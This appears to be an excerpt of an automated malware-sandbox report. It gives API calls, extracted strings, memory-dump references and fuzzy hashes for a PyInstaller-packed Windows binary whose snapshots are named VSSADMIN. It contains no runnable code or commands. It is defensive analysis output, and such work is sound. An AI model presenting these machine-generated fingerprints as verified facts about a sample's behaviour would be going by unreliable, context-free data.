• Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
• Instruction Fuzzy Hash: 33510426608BA187DA349F26E4581BAB7B1FB98B65F004122EBCF83684DF3DD045DB10
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
• FormatMessageW.KERNEL32 ref: 00007FF614C77536
• WideCharToMultiByte.KERNEL32 ref: 00007FF614C7758C
  • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-3505189403
• Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
• Instruction ID: 9e498f8d3759ac16d0be59944cde15ce73329b611ef7225304972c15ac2f5965
• Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
• Instruction Fuzzy Hash: DE217F31A0CE4792EB609B14E8C42B672B5FB4ABA9F844037E54EC36A4EF7DE505C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: fa9940231bde350a5f98b79da4d3c21430d5b5273eb9d997a56d31e660f397a8
• Instruction ID: aece6c676b0adb97a7f5f1c0a70427e95a1acb329a6bcbdebd219e3f3b4a6242
• Opcode Fuzzy Hash: fa9940231bde350a5f98b79da4d3c21430d5b5273eb9d997a56d31e660f397a8
• Instruction Fuzzy Hash: 2612B4B2E0C94786FB205B16E0946BA7271FB82F64F864137D699876C4DF3CE480EB54
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastsetsockopt
• String ID: ..\s\crypto\bio\b_sock2.c$o
• API String ID: 1729277954-1872632005
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
• String ID: Service-0x$_OPENSSL_isservice
• API String ID: 1944374717-1672312481
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
• API String ID: 2895956056-3524285272
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,0000014C6ACFB978,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF64
• GetProcAddress.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,0000014C6ACFB978,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF70
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
Uniqueness

Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C776CF
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C7771F
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 626452242-27947307
                                                                                                                                                                      • Opcode ID: 48cdb819274e2c7c46086e4e80051458de93d23bd0bf89cf80ce51d91e6527a2
                                                                                                                                                                      • Instruction ID: be9c5c0f96c7cc321c3e6c029572b49928f14f46e004a2b7fa553ec906b9ddcb
                                                                                                                                                                      • Opcode Fuzzy Hash: 48cdb819274e2c7c46086e4e80051458de93d23bd0bf89cf80ce51d91e6527a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A416A32A0DF86C2E621DF15E48016AB6B5FB86BA4F584136DA8D87B95EF38E451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77BB1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77C25
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 3723044601-27947307
• Opcode ID: 18245a40d80a6abdcbe2c7b8b5705f5c27a25298c5fa8019f4baef1b086b9209
• Instruction ID: fe8a6ae26e3ecb7da4d6e6d34c4b00048e45e808c1be3054de304a6fa9a9bd34
• Opcode Fuzzy Hash: 18245a40d80a6abdcbe2c7b8b5705f5c27a25298c5fa8019f4baef1b086b9209
• Instruction Fuzzy Hash: 28216B31A0DF4796EA109F16E8800797AB1EB9AFA4B584137CA4EC3794EF7DE411C300
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
• Opcode ID: 325dff1c9f2a8cc2ee0691d31cb87a7dd6083bcd652a905222ad4063330fef06
• Instruction ID: be00e0ded957f39a9aad41b3018f731060724f15afe17f63d3cda6ad63f9dafa
• Opcode Fuzzy Hash: 325dff1c9f2a8cc2ee0691d31cb87a7dd6083bcd652a905222ad4063330fef06
• Instruction Fuzzy Hash: 02128461E0C94386FB649A15D1942F976B1FB82F74F884137E68A876C4DF3CE580EB04
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: Fiber$Switch$CreateDelete
• String ID: *$..\s\crypto\async\async.c
• API String ID: 2050058302-1471988776
• Opcode ID: c3e675d2ea6c9e8d84eec431eb5387898f63f209a2c3a50f4d01a6750cc88dd1
• Instruction ID: 473647d19a1cb60abaa2933463ad81ab0d3a768b69592150b346492ff2e0cca4
• Opcode Fuzzy Hash: c3e675d2ea6c9e8d84eec431eb5387898f63f209a2c3a50f4d01a6750cc88dd1
• Instruction Fuzzy Hash: A2A19C76B09B0A81EB28DF15E4A06BD73A0EB44B84F044436CB8D47795EFBDE865E300
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 626452242-876015163
• Opcode ID: f1753c96322f7a069f158a41c988c25d6713a1fcd3091b317cf7193edec7cc56
• Instruction ID: fc7d11dce1dbd0b2b2a54d215174a0690c67da5781ec21c6da92c7c9be470ab7
• Opcode Fuzzy Hash: f1753c96322f7a069f158a41c988c25d6713a1fcd3091b317cf7193edec7cc56
• Instruction Fuzzy Hash: 29418F32A0DE46C2EA10DF15E48017A66B5FB96FA4F148137DA8D87BA5EF3CE451C700
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID: OPENSSL_ia32cap$~$~$~$~
                                                                                                                                                                      • API String ID: 1431749950-1981414212
                                                                                                                                                                      • Opcode ID: cf480c52fdec152708fcec39c4b82c05f8550ca0c57a004c4734a86e6d7d47de
                                                                                                                                                                      • Instruction ID: 09e4fa7a6e1cfb4a179e05aa3f0ce0ebbf304b8081f6cc124100e2901241ff19
                                                                                                                                                                      • Opcode Fuzzy Hash: cf480c52fdec152708fcec39c4b82c05f8550ca0c57a004c4734a86e6d7d47de
                                                                                                                                                                      • Instruction Fuzzy Hash: 50414C26F0D65F85E7189B01A4B027873A0EB44790F884236DF6D47798EF2CE489E740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CF9D
• GetLastError.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFAB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFD5
• FreeLibrary.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D01B
• GetProcAddress.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D027
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: e8a6d54e8b280745c35d25ebb5fd2685d369d120d0d8ba32cf5e912c9d21884b
• Instruction ID: 09a2d82cc85ce2739dfa8aa615a07dd884f482aea23070680b49e0b6b8009704
• Opcode Fuzzy Hash: e8a6d54e8b280745c35d25ebb5fd2685d369d120d0d8ba32cf5e912c9d21884b
• Instruction Fuzzy Hash: 9731BE22A1EE4292EE519B06A88097523F4FF4AFB5F591536DD1ECB390EF3CE4468710
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF614C767F1,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C764FF
  • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
Strings
• LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF614C76513
• LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF614C764D6
• LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF614C7655A
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
• API String ID: 1662231829-3498232454
• Opcode ID: a923076141be09bbc7de495348c051f7aeed93bc067fef176d064635955aa6b8
• Instruction ID: 5329e482434e14f76dc2ae72854091868df9aaaebfc69258aac4c527fd38dbe9
• Opcode Fuzzy Hash: a923076141be09bbc7de495348c051f7aeed93bc067fef176d064635955aa6b8
• Instruction Fuzzy Hash: 21318911B1CF8352FA609725E9D53BA6171AF9AFE1F844033DA4EC379AEE2DE5049700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: MASK:$default$nombstr$pkix$utf8only
• API String ID: 3568877910-3483942737
• Opcode ID: 0eb005829b5090700deec3fa77c1e89360f57b44948d3d3a333400b0d416245b
• Instruction ID: 0b38e186f771a4c7610b39bf5a2dd740d048edcc5f21bdac5e7fe32f2c53e653
• Opcode Fuzzy Hash: 0eb005829b5090700deec3fa77c1e89360f57b44948d3d3a333400b0d416245b
• Instruction Fuzzy Hash: 42314D22B1C58D86EB598B1CF4A03BD77A0FB85750F844232EB5E43A99DE1CE495D700
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
  • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77B20
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 3723044601-876015163
• Opcode ID: af1bd620760198096b51ffca5ad4a35e36406969f2f33d318404d75935fb6e44
• Instruction ID: 717150f64954594f96bb834c5812009267792c145566cc19a8c116bdf769a571
• Opcode Fuzzy Hash: af1bd620760198096b51ffca5ad4a35e36406969f2f33d318404d75935fb6e44
• Instruction Fuzzy Hash: 59215526B0CE4292EB50DB19F480069A3B1FB86BE8F584137DB5CC3B69EE2DE5518700
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A65F
• FlsGetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A674
• FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A695
• FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6C2
• FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6D3
• FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6E4
• SetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6FF
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A7D7
• FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A80D
• FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A83A
• FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A84B
• FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A85C
• SetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A877
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007D592F1170
• String ID: ..\s\crypto\x509v3\v3_utl.c$E$FALSE$TRUE
• API String ID: 4247867426-1433594941
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                      • API String ID: 3081866767-2699770090
